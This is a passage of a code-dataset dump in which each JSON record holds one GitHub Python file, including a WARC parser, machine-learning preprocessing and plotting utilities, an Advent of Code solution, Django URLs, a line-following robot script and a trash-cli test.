))\n )\n # TODO: obsolete\n param_filter: typing.List[str] = field(\n default=None,\n metadata=dict(\n title='Допустимые параметры для класса',\n missing=None,\n is_hidden=True)\n )\n\n analytic: ClassImportAnalytic = field(\n default=None,\n metadata=dict(\n title=\"Аналитика данных\",\n allow_none=True,\n unwrap=True,\n readonly=True, )\n )\n","repo_name":"MikhailovaAnna/SanTelegramBot","sub_path":"venv/lib/python3.8/site-packages/compel_shared/classes/class_.py","file_name":"class_.py","file_ext":"py","file_size_in_byte":12173,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70260605320","text":"import numpy as np\nfrom scipy.linalg import svd\nfrom collections import Counter\nfrom copy import deepcopy\nfrom pdb import set_trace\n\ndef pca(X, n_components = 5):\n # Use svd to perform PCA on X\n # Inputs:\n # X: input matrix\n # n_components: number of principal components to keep\n # Output:\n # principal_components: the top n_components principal_components\n # X_pca = X.dot(principal_components)\n\n U, s, Vh = svd(X)\n\n principal_components = Vh.T[:,:n_components]\n return principal_components\n\ndef vector_norm(x, norm=\"Min-Max\"):\n # Calculate the normalized vector\n # Input x: 1-d np.array\n if norm == \"Min-Max\":\n min_norm_value = min(x)\n max_norm_value = max(x)\n x_norm = (x - min_norm_value) / (max_norm_value - min_norm_value)\n elif norm == \"L1\":\n for key in range(0,len(x)):\n sum_x = np.sum(abs(x[key]))\n x_norm = x / sum_x\n elif norm == \"L2\":\n for key in range(0,len(x)):\n sum_square = np.sum(x[key] ** 2)\n x_norm = x/np.sqrt(sum_square)\n elif norm == \"Standard_Score\":\n mean = np.mean(x)\n standard_deviation = np.std(x)\n x_norm = (x-mean)/standard_deviation\n else:\n raise Exception(\"Unknown normlization.\")\n return x_norm\n\ndef normalize(X, norm=\"Min-Max\", axis = 1):\n # Inputs:\n # X: input matrix\n # norm = {\"L1\", \"L2\", \"Min-Max\", 
\"Standard_Score\"}\n # axis = 0: normalize rows\n # axis = 1: normalize columns\n # Output:\n # X_norm: normalized matrix (numpy.array)\n\n X_norm = deepcopy(np.asarray(X))\n m, n = X_norm.shape\n if axis == 1:\n for col in range(n):\n X_norm[:,col] = vector_norm(X_norm[:,col], norm=norm)\n elif axis == 0:\n X_norm = np.array([vector_norm(X_norm[i], norm=norm) for i in range(m)])\n else:\n raise Exception(\"Unknown axis.\")\n return X_norm\n\ndef stratified_sampling(y, ratio, replace = True):\n # Inputs:\n # y: class labels\n # 0 < ratio < 1: number of samples = len(y) * ratio\n # replace = True: sample with replacement\n # replace = False: sample without replacement\n # Output:\n # sample: indices of stratified sampled points\n # (ratio is the same across each class,\n # samples for each class = int(np.ceil(ratio * # data in each class)) )\n\n samp = []\n if ratio<=0 or ratio>=1:\n raise Exception(\"ratio must be 0 < ratio < 1.\")\n y_array = np.asarray(y)\n # Write your own code below\n setosa = [index for index, label in enumerate(y_array) if label == \"Iris-setosa\"]\n vesicolor = [index for index, label in enumerate(y_array) if label == \"Iris-versicolor\"]\n verginca = [index for index, label in enumerate(y_array) if label == \"Iris-virginica\"]\n listed_together = [setosa,vesicolor,verginca]\n for value in range(0, len(listed_together)):\n size = int(np.ceil(ratio * len(listed_together[value])))\n samp.append(np.random.choice(listed_together[value],size,replace=replace))\n sample = np.concatenate((samp), axis=0)\n return sample","repo_name":"rj08-97/DSCI-633","sub_path":"assignments/assignment7/my_preprocess.py","file_name":"my_preprocess.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72639370119","text":"import sys, os\nsys.path.append(os.path.abspath('../day 1'))\nfrom baseclass import Solution\n\n# imports required for solution:\nimport re\n\nclass Solution_Repo(Solution):\n\n def __init__(self):\n Solution.__init__(self)\n self.REPO_OWNER = \"brianbarbieri\"\n self.REPO_URL = \"https://github.com/brianbarbieri/adventofcode2020\"\n self.FILENAME = \"solutions/solution_1.py\"\n\n def part_1(self):\n with open(os.path.dirname(__file__) + \"/../input.txt\", \"r\") as r:\n data = [l.replace(\"\\n\", \"\").replace(\"bags\", \"bag\").replace(\"bag\", \"bags\") for l in r.readlines()]\n\n # first split input up in dict with bagcol(key) in bagcols(list of values)\n # start with splitting up on contain:\n data_c = [line.split(\" contain \") for line in data]\n bag_regex = r\"[0-9]+ ([a-z ]+)\"\n bag_dict = {}\n for bag in data_c:\n \n bags = re.findall(bag_regex, bag[-1])\n \n for bg in bags:\n if bg not in bag_dict:\n bag_dict[bg] = set()\n bag_dict[bg].add(bag[0])\n\n # now start with the \"shiny gold bags\" and iterate to see which bags to add\n found_bags = set()\n to_add = [\"shiny gold bags\"]\n while len(to_add) > 0:\n current_bag = to_add.pop()\n new_bags = bag_dict.get(current_bag)\n if new_bags is not None:\n for bag in new_bags:\n found_bags.add(bag)\n to_add += new_bags\n return len(found_bags)\n \n\n def part_2(self):\n with open(os.path.dirname(__file__) + \"/../input.txt\", \"r\") as r:\n data = [l.replace(\"\\n\", \"\").replace(\"bags\", \"bag\").replace(\"bag\", \"bags\") for l in r.readlines()] \n\n class Bag:\n def __init__(self, colour, value, multifactor, childeren):\n self.colour = colour\n self.value = value\n self.multifactor = multifactor\n self.childeren 
= childeren\n\n def __repr__(self):\n return str([self.colour, self.value, self.multifactor, self.childeren])\n\n def calculate_value(self):\n return self.value*self.multifactor\n\n data_c = [line.split(\" contain \") for line in data]\n bag_regex = r\"([0-9]+) ([a-z ]+)\"\n\n bag_dict = {}\n for bag in data_c:\n bags = re.findall(bag_regex, bag[-1])\n bag_dict[bag[0]] = bags\n \n score = -1\n bag_collection = [Bag(\"shiny gold bags\", 1, 1, bag_dict[\"shiny gold bags\"])]\n while len(bag_collection) > 0:\n current_bag = bag_collection.pop()\n score += current_bag.multifactor\n for child in current_bag.childeren:\n bag_collection.append(\n Bag(child[-1], int(child[0]), current_bag.multifactor*int(child[0]), bag_dict[child[-1]])\n )\n return score","repo_name":"brianbarbieri/Advent-of-code-speed-tests","sub_path":"2020/day 7/solutions/solution_1.py","file_name":"solution_1.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"13883691438","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom bloghome import views\nimport bloghome\n\nurlpatterns = [\n path('home/', views.home, name='home'),\n path('forum/', views.forum, name='forum'),\n path('human_right/', views.human_right, name='human_right'),\n path('anti_corruption/', views.anti_corruption, name='anti_corruption'),\n path('contact/', views.contact, name='contact'),\n path('centers/', views.centers, name='centers'),\n path('agent/', views.agent, name='agent'),\n path('technology/', views.technology, name='technology'),\n path('register/', views.register, name='register'),\n path('accounts/', include('django.contrib.auth.urls')),\n]","repo_name":"olukunleoson/Updated_blog","sub_path":"bloghome/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70882230600","text":"\"\"\"An object to represent warc records, using the abstract record in\nrecord.py\"\"\"\n\nimport re\nimport hashlib\nfrom hanzo.warctools.record import ArchiveRecord, ArchiveParser\nfrom hanzo.warctools.archive_detect import register_record_type\nimport uuid\n\nbad_lines = 5 # when to give up looking for the version stamp\n\n\n@ArchiveRecord.HEADERS(\n DATE=b'WARC-Date',\n TYPE=b'WARC-Type',\n ID=b'WARC-Record-ID',\n CONCURRENT_TO=b'WARC-Concurrent-To',\n REFERS_TO=b'WARC-Refers-To',\n REFERS_TO_TARGET_URI=b'WARC-Refers-To-Target-URI',\n REFERS_TO_DATE=b'WARC-Refers-To-Date',\n CONTENT_LENGTH=b'Content-Length',\n CONTENT_TYPE=b'Content-Type',\n URL=b'WARC-Target-URI',\n BLOCK_DIGEST=b'WARC-Block-Digest',\n PAYLOAD_DIGEST=b'WARC-Payload-Digest',\n IP_ADDRESS=b'WARC-IP-Address',\n FILENAME=b'WARC-Filename',\n WARCINFO_ID=b'WARC-Warcinfo-ID',\n PROFILE=b'WARC-Profile'\n)\nclass WarcRecord(ArchiveRecord):\n\n # Pylint is very bad at decorators, E1101 is the message that says\n # a member variable does not exist\n\n # pylint: disable-msg=E1101\n\n VERSION = b\"WARC/1.0\"\n VERSION18 = b\"WARC/0.18\"\n VERSION17 = b\"WARC/0.17\"\n RESPONSE = b\"response\"\n RESOURCE = b\"resource\"\n REQUEST = b\"request\"\n REVISIT = b\"revisit\"\n METADATA = b\"metadata\"\n CONVERSION = b\"conversion\"\n WARCINFO = b\"warcinfo\"\n\n PROFILE_IDENTICAL_PAYLOAD_DIGEST = b\"http://netpreserve.org/warc/1.0/revisit/identical-payload-digest\"\n\n TRAILER = b'\\r\\n\\r\\n'\n\n def __init__(self, version=VERSION, headers=None, content=None,\n 
errors=None, content_file=None):\n \"\"\"\n WarcRecord constructor.\n\n Either content or content_file must be provided, but not both. If\n content, which is a tuple (content_type, content_buffer), is provided,\n when writing the warc record, any Content-Type and Content-Length that\n appear in the supplied headers are ignored, and the values content[0]\n and len(content[1]), respectively, are used. \n\n When reading, the caller can stream content_file or use content, which is\n lazily filled using content_file, and after which content_file is\n unavailable.\n \"\"\"\n ArchiveRecord.__init__(self, headers, content, errors)\n self.version = version\n self.content_file = content_file\n\n @property\n def id(self):\n return self.get_header(self.ID)\n\n def _write_to(self, out, nl):\n \"\"\"WARC Format:\n VERSION NL\n (Key: Value NL)*\n NL\n CONTENT NL\n NL\n\n don't write multi line headers\n \"\"\"\n out.write(self.version)\n out.write(nl)\n for k, v in self.headers:\n if self.content_file is not None or k not in (self.CONTENT_TYPE, self.CONTENT_LENGTH):\n out.write(k)\n out.write(b\": \")\n out.write(v)\n out.write(nl)\n\n if self.content_file is not None:\n out.write(nl) # end of header blank nl\n while True:\n buf = self.content_file.read(8192)\n if buf == b'': break\n out.write(buf)\n else:\n # if content tuple is provided, set Content-Type and\n # Content-Length based on the values in the tuple\n content_type, content_buffer = self.content\n\n if content_type:\n out.write(self.CONTENT_TYPE)\n out.write(b\": \")\n out.write(content_type)\n out.write(nl)\n if content_buffer is None:\n content_buffer = b\"\"\n\n content_length = len(content_buffer)\n out.write(self.CONTENT_LENGTH)\n out.write(b\": \")\n out.write(str(content_length).encode('ascii'))\n out.write(nl)\n\n out.write(nl) # end of header blank nl\n if content_buffer:\n out.write(content_buffer)\n \n # end of record nl nl\n out.write(nl)\n out.write(nl)\n out.flush()\n\n def repair(self):\n pass\n\n def validate(self):\n return self.errors\n\n @classmethod\n def make_parser(self):\n return WarcParser()\n\n def block_digest(self, content_buffer):\n block_hash = hashlib.sha256()\n block_hash.update(content_buffer)\n\n digest = \"sha256:%s\" % block_hash.hexdigest()\n return digest\n\n @staticmethod\n def warc_uuid(text):\n return \"<urn:uuid:{}>\".format(uuid.UUID(hashlib.sha1(text).hexdigest()[0:32])).encode('ascii')\n\n @staticmethod\n def random_warc_uuid():\n return \"<urn:uuid:{}>\".format(uuid.uuid4()).encode('ascii')\n\n\ndef rx(pat):\n \"\"\"Helper to compile regexps with IGNORECASE option set.\"\"\"\n return re.compile(pat, flags=re.IGNORECASE)\n\nversion_rx = rx(br'^(?P<prefix>.*?)(?P<version>\\s*WARC/(?P<number>.*?))'\n b'(?P<nl>\\r\\n|\\r|\\n)\\\\Z')\n# a header is key: value plus any following lines with leading whitespace\nheader_rx = rx(br'^(?P<name>.*?):\\s?(?P<value>.*?)' b'(?P<nl>\\r\\n|\\r|\\n)\\\\Z')\nvalue_rx = rx(br'^\\s+(?P<value>.+?)' b'(?P<nl>\\r\\n|\\r|\\n)\\\\Z')\nnl_rx = rx(b'^(?P<nl>\\r\\n|\\r|\\n\\\\Z)')\nlength_rx = rx(b'^' + WarcRecord.CONTENT_LENGTH + b'$' ) # pylint: disable-msg=E1101\ntype_rx = rx(b'^' + WarcRecord.CONTENT_TYPE + b'$') # pylint: disable-msg=E1101\n\nrequired_headers = set((\n WarcRecord.TYPE.lower(), # pylint: disable-msg=E1101\n WarcRecord.ID.lower(), # pylint: disable-msg=E1101\n WarcRecord.CONTENT_LENGTH.lower(), # pylint: disable-msg=E1101\n WarcRecord.DATE.lower(), # pylint: disable-msg=E1101\n ))\n\n\nclass WarcParser(ArchiveParser):\n KNOWN_VERSIONS = set((b'1.0', b'0.17', b'0.18'))\n\n def parse(self, stream, offset, line=None):\n \"\"\"Reads a warc record 
from the stream, returns a tuple\n (record, errors). Either records is null or errors is\n null. Any record-specific errors are contained in the record -\n errors is only used when *nothing* could be parsed\"\"\"\n # pylint: disable-msg=E1101\n errors = []\n version = None\n # find WARC/.*\n if line is None:\n line = stream.readline()\n\n while line:\n match = version_rx.match(line)\n\n if match:\n version = match.group('version')\n if offset is not None:\n offset += len(match.group('prefix'))\n break\n else:\n if offset is not None:\n offset += len(line)\n if not nl_rx.match(line):\n errors.append(('ignored line', line))\n if len(errors) > bad_lines:\n errors.append(('too many errors, giving up hope',))\n return (None, errors, offset)\n line = stream.readline()\n if not line:\n if version:\n errors.append(('warc version but no headers', version))\n return (None, errors, offset)\n if line:\n content_length = 0\n content_type = None\n\n record = WarcRecord(errors=errors, version=version)\n\n if match.group('nl') != b'\\x0d\\x0a':\n record.error('incorrect newline in version', match.group('nl'))\n\n if match.group('number') not in self.KNOWN_VERSIONS:\n record.error('version field is not known (%s)'\n % (\",\".join(self.KNOWN_VERSIONS)),\n match.group('number'))\n\n prefix = match.group('prefix')\n\n if prefix:\n record.error('bad prefix on WARC version header', prefix)\n\n #Read headers\n line = stream.readline()\n while line and not nl_rx.match(line):\n\n #print 'header', repr(line)\n match = header_rx.match(line)\n if match:\n if match.group('nl') != b'\\x0d\\x0a':\n record.error('incorrect newline in header',\n match.group('nl'))\n name = match.group('name').strip()\n value = [match.group('value').strip()]\n #print 'match',name, value\n\n line = stream.readline()\n match = value_rx.match(line)\n while match:\n #print 'follow', repr(line)\n if match.group('nl') != b'\\x0d\\x0a':\n record.error('incorrect newline in follow header',\n line, match.group('nl'))\n value.append(match.group('value').strip())\n line = stream.readline()\n match = value_rx.match(line)\n\n value = b\" \".join(value)\n\n record.headers.append((name, value))\n\n if type_rx.match(name):\n if value:\n content_type = value\n else:\n record.error('invalid header', name, value)\n elif length_rx.match(name):\n try:\n #print name, value\n content_length = int(value)\n #print content_length\n except ValueError:\n record.error('invalid header', name, value)\n\n # have read blank line following headers\n\n record.content_file = stream\n record.content_file.bytes_to_eoc = content_length\n\n # check mandatory headers \n # WARC-Type WARC-Date WARC-Record-ID Content-Length\n\n return (record, (), offset)\n\n\nblank_rx = rx(br'^$')\nregister_record_type(version_rx, WarcRecord)\nregister_record_type(blank_rx, WarcRecord)\n\n\ndef make_response(id, date, url, content, request_id):\n # pylint: disable-msg=E1101\n headers = [\n (WarcRecord.TYPE, WarcRecord.RESPONSE),\n (WarcRecord.ID, id),\n (WarcRecord.DATE, date),\n (WarcRecord.URL, url),\n\n ]\n if request_id:\n headers.append((WarcRecord.CONCURRENT_TO, request_id))\n\n record = WarcRecord(headers=headers, content=content)\n\n return record\n\n\ndef make_request(request_id, date, url, content, response_id):\n # pylint: disable-msg=E1101\n headers = [\n (WarcRecord.TYPE, WarcRecord.REQUEST),\n (WarcRecord.ID, request_id),\n (WarcRecord.DATE, date),\n (WarcRecord.URL, url),\n\n ]\n if response_id:\n headers.append((WarcRecord.CONCURRENT_TO, response_id))\n\n record = 
WarcRecord(headers=headers, content=content)\n\n return record\n\n\ndef make_metadata(meta_id, date, content, concurrent_to=None, url=None):\n # pylint: disable-msg=E1101\n headers = [\n (WarcRecord.TYPE, WarcRecord.METADATA),\n (WarcRecord.ID, meta_id),\n (WarcRecord.DATE, date),\n\n ]\n if concurrent_to:\n headers.append((WarcRecord.CONCURRENT_TO, concurrent_to))\n\n if url:\n headers.append((WarcRecord.URL, url))\n\n record = WarcRecord(headers=headers, content=content)\n\n return record\n\n\ndef make_conversion(conv_id, date, content, refers_to=None, url=None):\n # pylint: disable-msg=E1101\n headers = [\n (WarcRecord.TYPE, WarcRecord.CONVERSION),\n (WarcRecord.ID, conv_id),\n (WarcRecord.DATE, date),\n\n ]\n if refers_to:\n headers.append((WarcRecord.REFERS_TO, refers_to))\n\n if url:\n headers.append((WarcRecord.URL, url))\n\n record = WarcRecord(headers=headers, content=content)\n\n return record\n\n\ndef warc_datetime_str(d):\n s = d.isoformat()\n if '.' in s:\n s = s[:s.find('.')]\n return (s + 'Z').encode('utf-8')\n","repo_name":"internetarchive/warctools","sub_path":"hanzo/warctools/warc.py","file_name":"warc.py","file_ext":"py","file_size_in_byte":11905,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"63"} +{"seq_id":"86681399120","text":"# -*- coding: utf-8 -*-\nfrom DateTime import DateTime\nfrom plone.app.discussion.interfaces import IConversation\nfrom redturtle.exporter.base.interfaces import ICustomDataExporter\nfrom zope.component import adapter\nfrom zope.interface import implementer\nfrom zope.interface import Interface\n\n\n@adapter(Interface, Interface)\n@implementer(ICustomDataExporter)\nclass DiscussionsExporter(object):\n order = 2\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n\n def __call__(self):\n \"\"\"\n \"\"\"\n conversation = IConversation(self.context)\n comments = conversation.getComments()\n comments = [comment for comment in comments]\n tmp_lst = []\n for item in comments:\n tmp_dict = item.__dict__\n if not tmp_dict.get(\"status\"):\n states = list(tmp_dict[\"workflow_history\"].values())\n comment_status = states[0][-1][\"review_state\"]\n try:\n del tmp_dict[\"__parent__\"]\n del tmp_dict[\"workflow_history\"]\n except Exception:\n pass\n tmp_dict[\"modification_date\"] = (\n DateTime(tmp_dict[\"modification_date\"])\n .asdatetime()\n .isoformat()\n )\n tmp_dict[\"creation_date\"] = (\n DateTime(tmp_dict[\"creation_date\"]).asdatetime().isoformat()\n )\n if not tmp_dict.get(\"status\"):\n tmp_dict.update({\"status\": comment_status})\n tmp_lst.append(tmp_dict)\n return {\"discussions\": tmp_lst}\n","repo_name":"RedTurtle/redturtle.exporter.base","sub_path":"src/redturtle/exporter/base/adapters/discussions.py","file_name":"discussions.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"31919627805","text":"\nfrom hobo.preprocess import *\nfrom hobo.collect import *\n\ndef preprocess_one_hobo(hobo_file, output_path):\n hd = HoboDataFrame(hobo_file)\n hd.preprocess()\n hd.output_df(output_path)\n\ndef collect_one_profile(uid, profile, output_folder):\n hdt = HoboTester(uid, profile)\n hdt.collect_one_person_all_days()\n 
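# write the per-person collected data out to the output folder\n 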
hdt.output_collected_data(output_folder)","repo_name":"chengxiangduan-usc/mecsc","sub_path":"final_test/data/hobo/hobo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40285554551","text":"import sys\n\nn, m = map(int, sys.stdin.readline().split())\nroads = [tuple(map(int, sys.stdin.readline().split())) for _ in range(m)]\nbuildings = [[0 for _ in range(n)] for _ in range(n)]\n\nfor i in range(n):\n for j in range(n):\n if i != j:\n buildings[i][j] = 987654321\n\nfor u, v, b in roads:\n buildings[u - 1][v - 1] = 0\n buildings[v - 1][u - 1] = int(b == 0)\n\nfor k in range(n):\n for i in range(n):\n for j in range(n):\n buildings[i][j] = min(buildings[i][j], buildings[i][k] + buildings[k][j])\n\nk = int(sys.stdin.readline())\nfor _ in range(k):\n s, e = map(int, sys.stdin.readline().split())\n print(buildings[s-1][e-1])\n","repo_name":"DKU-STUDY/Algorithm","sub_path":"BOJ/11562.백양로 브레이크/6047198844.py","file_name":"6047198844.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"63"} +{"seq_id":"1141226074","text":"import cv2\nimport numpy as np\nimport serial\nimport time\n\ncap = cv2.VideoCapture(0)\nser = serial.Serial('COM3', 9600, timeout=1)\n\nwhile True:\n ret, frame = cap.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n _, thresh = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n if len(contours) > 0:\n c = max(contours, key=cv2.contourArea)\n M = cv2.moments(c)\n\n if M['m00'] != 0:\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n if cx < 320:\n # Turn left\n error = 320 - cx\n speed = int(abs(error) / 3)\n ser.write(bytes([0x01, 0x00, speed]))\n else:\n # Turn right\n error = cx - 320\n speed = int(abs(error) / 3)\n ser.write(bytes([0x02, 0x00, speed]))\n else:\n # Line lost, stop\n ser.write(bytes([0x00, 0x00, 0x00]))\n\n cv2.drawContours(frame, contours, -1, (0, 255, 0), 3)\n cv2.imshow('frame', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nser.close()\ncap.release()\ncv2.destroyAllWindows()","repo_name":"RedCloud79/linetrace_arduino","sub_path":"cam_line_test1.py","file_name":"cam_line_test1.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43142095141","text":"import glob\nimport json\nimport math\nimport os\nimport statistics\n\nimport matplotlib.pyplot as plt\n\n\ndef get_template_results(args):\n return {\"config\": args, \"results\": []}\n\n\ndef get_save_folder(model, date, label):\n year_month, day = date[:6], date[6:]\n week_number = math.ceil(int(day) / 7)\n\n folder_path = os.path.join(\n \"results\", \"dev\", model, year_month, \"week_{}\".format(week_number),\n \"{}_{}\".format(date, label)\n )\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n\n return folder_path\n\n\ndef save_results(results, label, model, date, run_id, seed):\n del results[\"config\"][\"device\"]\n\n folder_path = get_save_folder(model, date, label)\n\n file_path = \"run_{}_.json\".format(seed)\n\n with open(os.path.join(folder_path, file_path), \"w+\") as f:\n try:\n json.dump(results, f, indent=2)\n except Exception:\n print(\"Failed to dump exps on json file.\")\n\n\ndef extract(paths, metric=\"avg_inc\", nb_classes=None):\n 
\"\"\"Extract accuracy logged in the various log files.\n\n :param paths: A path or a list of paths to a json file.\n :param avg_inc: Boolean specifying whether to use the accuracy or the average\n incremental accuracy as defined in iCaRL.\n :return: A list of runs. Each runs is a list of (average incremental) accuracies.\n \"\"\"\n if not isinstance(paths, list):\n paths = [paths]\n\n score_plot, score_tab = [], []\n for path in paths:\n with open(path) as f:\n data = json.load(f)\n\n if metric in (\"avg_inc\", \"accuracy\"):\n score_plot.append([100 * task[\"accuracy\"][\"total\"] for task in data[\"results\"]])\n elif metric == \"accuracy_top5\":\n score_plot.append([100 * task[\"accuracy_top5\"][\"total\"] for task in data[\"results\"]])\n elif metric == \"old_accuracy\":\n score_plot.append([100 * task.get(\"old_accuracy\", 0.) for task in data[\"results\"]])\n elif metric == \"new_accuracy\":\n score_plot.append([100 * task.get(\"new_accuracy\", 0.) for task in data[\"results\"]])\n elif metric == \"unseen\":\n score_plot.append(\n [100 * task.get(\"unseen_classes_accuracy\", 0.) for task in data[\"results\"]]\n )\n elif metric == \"seen\":\n score_plot.append(\n [100 * task.get(\"seen_classes_accuracy\", 0.) for task in data[\"results\"]]\n )\n else:\n raise ValueError(\"bouh\")\n\n if metric in (\"avg_inc\", \"accuracy\", \"accuracy_top5\", \"old_accuracy\", \"new_accuracy\"):\n score_tab.append(score_plot[-1])\n elif metric == \"avg_cls\":\n accs = []\n for class_id in range(nb_classes):\n class_accuracies = [\n 100 * task[\"accuracy_per_class\"][\"{:02d}-{:02d}\".format(class_id, class_id)]\n for task in data[\"results\"]\n if \"{:02d}-{:02d}\".format(class_id, class_id) in task[\"accuracy_per_class\"]\n ]\n if len(class_accuracies) > 0:\n accs.append(statistics.mean(class_accuracies))\n\n score_tab.append(accs)\n\n return score_plot, score_tab\n\n\ndef compute_avg_inc_acc(results):\n \"\"\"Computes the average incremental accuracy as defined in iCaRL.\n\n The average incremental accuracies at task X are the average of accuracies\n at task 0, 1, ..., and X.\n\n :param accs: A list of dict for per-class accuracy at each step.\n :return: A float.\n \"\"\"\n tasks_accuracy = [r[\"total\"] for r in results]\n return sum(tasks_accuracy) / len(tasks_accuracy)\n\n\ndef aggregate(runs_accs):\n \"\"\"Aggregate results of several runs into means & standard deviations.\n\n :param runs_accs: A list of runs. Each runs is a list of (average\n incremental) accuracies.\n :return: A list of means, and a list of standard deviations.\n \"\"\"\n means = []\n stds = []\n\n n_runs = len(runs_accs)\n for i in range(len(runs_accs[0])):\n ith_value = [runs_accs[j][i] for j in range(n_runs)]\n\n mean = sum(ith_value) / n_runs\n std = math.sqrt(sum(math.pow(mean - i, 2) for i in ith_value) / n_runs)\n\n means.append(mean)\n stds.append(std)\n\n return means, stds\n\n\ndef compute_unique_score(runs_accs, skip_first=False, first_n_steps=None):\n \"\"\"Computes the average of the (average incremental) accuracies to get a\n unique score.\n\n :param runs_accs: A list of runs. 
Each runs is a list of (average\n incremental) accuracies.\n :param skip_first: Whether to skip the first task accuracy as advised in\n End-to-End Incremental Accuracy.\n :return: A unique score being the average of the (average incremental)\n accuracies, and a standard deviation.\n \"\"\"\n start = int(skip_first)\n\n means = []\n for run in runs_accs:\n if first_n_steps:\n means.append(sum(run[start:first_n_steps]) / len(run[start:first_n_steps]))\n else:\n means.append(sum(run[start:]) / len(run[start:]))\n\n mean_of_mean = sum(means) / len(means)\n if len(runs_accs) == 1: # One run, probably a paper, don't compute std:\n std = \"\"\n else:\n std = math.sqrt(sum(math.pow(mean_of_mean - i, 2) for i in means) / len(means))\n std = \" ± \" + str(round(std, 2))\n\n return str(round(mean_of_mean, 2)), std\n\n\ndef get_max_label_length(results):\n return max(len(r.get(\"label\", r[\"path\"])) for r in results)\n\n\ndef plot(\n results,\n increment,\n total,\n initial_increment=None,\n x_ticks=None,\n title=\"\",\n path_to_save=None,\n max_acc=100,\n min_acc=0,\n first_n_steps=None,\n figsize=(10, 5),\n metric=\"avg_inc\",\n zeroshot=False,\n ylabel=\"Accuracy over seen classes\"\n):\n \"\"\"Plotting utilities to visualize several experiments.\n\n :param results: A list of dict composed of a \"path\", a \"label\", an optional\n \"average incremental\", an optional \"skip_first\".\n :param increment: The increment of classes per task.\n :param total: The total number of classes.\n :param initial_increment: Increment initial, default to 0.\n :param title: Plot title.\n :param path_to_save: Optional path where to save the image.\n \"\"\"\n plt.figure(figsize=figsize)\n\n initial_increment = initial_increment or increment\n x = list(range(initial_increment, total + 1, increment))\n\n for result in results:\n path = result.get(\"path\", \"\")\n label = result.get(\"label\", path.rstrip(\"/\").split(\"/\")[-1])\n skip_first = result.get(\"skip_first\", False)\n kwargs = result.get(\"kwargs\", {})\n\n if result.get(\"hidden\", False):\n continue\n\n if path:\n if \"*\" in path:\n path = glob.glob(path)\n elif os.path.isdir(path):\n path = glob.glob(os.path.join(path, \"*.json\"))\n\n score_plot, score_tab = extract(path, metric=metric, nb_classes=total)\n else:\n score_plot = result[\"runs_accs\"]\n score_tab = score_plot\n\n means, stds = aggregate(score_plot)\n\n if first_n_steps is not None:\n x, means, stds = x[:first_n_steps], means[:first_n_steps], stds[:first_n_steps]\n\n unique_score, unique_std = compute_unique_score(\n score_tab, skip_first=skip_first, first_n_steps=first_n_steps\n )\n\n label = \"{label} ({avg})\".format(\n label=label, avg=unique_score + unique_std, last=round(means[-1], 2)\n )\n\n try:\n bar = plt.errorbar(x, means, stds, label=label, marker=\"o\", markersize=3, **kwargs)\n except Exception:\n print(x)\n print(means)\n print(stds)\n print(label)\n raise\n\n if zeroshot:\n unseen_accs, _ = extract(path, \"unseen\", nb_classes=total)\n plt.plot(\n x[:-1], unseen_accs[0][:-1], linestyle='dashed', color=bar.lines[0].get_color()\n )\n seen_accs, _ = extract(path, \"seen\", nb_classes=total)\n plt.plot(x, seen_accs[0], linestyle='dotted', color=bar.lines[0].get_color())\n\n plt.legend(loc=\"upper right\")\n plt.xlabel(\"Number of classes\")\n plt.ylabel(ylabel)\n plt.title(title)\n\n for y in range(min_acc, max_acc + 1, 10):\n plt.axhline(y=y, color='black', linestyle='dashed', linewidth=1, alpha=0.2)\n plt.yticks(list(range(min_acc, max_acc + 1, 10)))\n\n x_ticks = x_ticks or 
increment\n plt.xticks(list(range(initial_increment, total + 1, x_ticks)))\n\n if path_to_save:\n os.makedirs(os.path.dirname(path_to_save), exist_ok=True)\n plt.savefig(path_to_save)\n plt.show()\n","repo_name":"arthurdouillard/incremental_learning.pytorch","sub_path":"inclearn/lib/results_utils.py","file_name":"results_utils.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"63"} +{"seq_id":"17466295468","text":"from nose.tools import istest, assert_equals, assert_in\nimport subprocess\nfrom subprocess import STDOUT, PIPE, check_output, call, Popen\nfrom .assert_equals_with_unidiff import assert_equals_with_unidiff as assert_equals\nfrom textwrap import dedent\n\nfrom pprint import pprint\nimport sys\n\nclass TestScriptsSmoke:\n def test_trash_rm_works(self):\n self.run_script('trash-rm')\n assert_in(\"Usage:\", self.stderr.splitlines())\n\n def test_trash_put_works(self):\n self.run_script('trash-put')\n assert_in(\"Usage: trash-put [OPTION]... FILE...\",\n self.stderr.splitlines())\n\n def test_trash_put_touch_filesystem(self):\n self.run_script('trash-put', 'non-existent')\n assert_equals(\"trash-put: cannot trash non existent 'non-existent'\\n\",\n self.stderr)\n\n def run_script(self, script, *args):\n process = Popen([sys.executable, script] + list(args),\n env={'PYTHONPATH':'.'},\n stdin=None,\n stdout=PIPE,\n stderr=PIPE)\n\n 